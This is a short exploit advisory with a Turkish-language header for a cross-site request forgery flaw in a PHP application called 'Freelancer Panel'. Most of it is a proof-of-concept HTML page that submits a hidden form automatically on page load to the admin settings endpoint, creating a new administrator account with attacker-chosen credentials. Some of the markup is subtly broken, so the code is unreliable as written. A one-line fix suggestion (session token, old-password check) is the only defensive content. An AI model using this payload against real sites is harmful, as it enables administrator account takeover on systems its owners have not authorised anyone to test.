< ------------------- header data start ------------------- >

#############################################################

# Application Name : Freelancer Panel

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form action=http://www.hidden.com/freelancer_panel/admincp/main.php?action=settings&subaction=add

method=post>

<input type=text name=username id=username value=addadd title=username />
<input type=password name=password id=password value=addadd title=password />
<input type=text name=email id=email value=[email protected] title=Email />
<input type=text name=name id=name value=addadd title=Name />
<input type=radio name=status id=status value=active title=active checked>


<input class=button type=submit name=submit value=create Admin />

< -- bug code end of -- >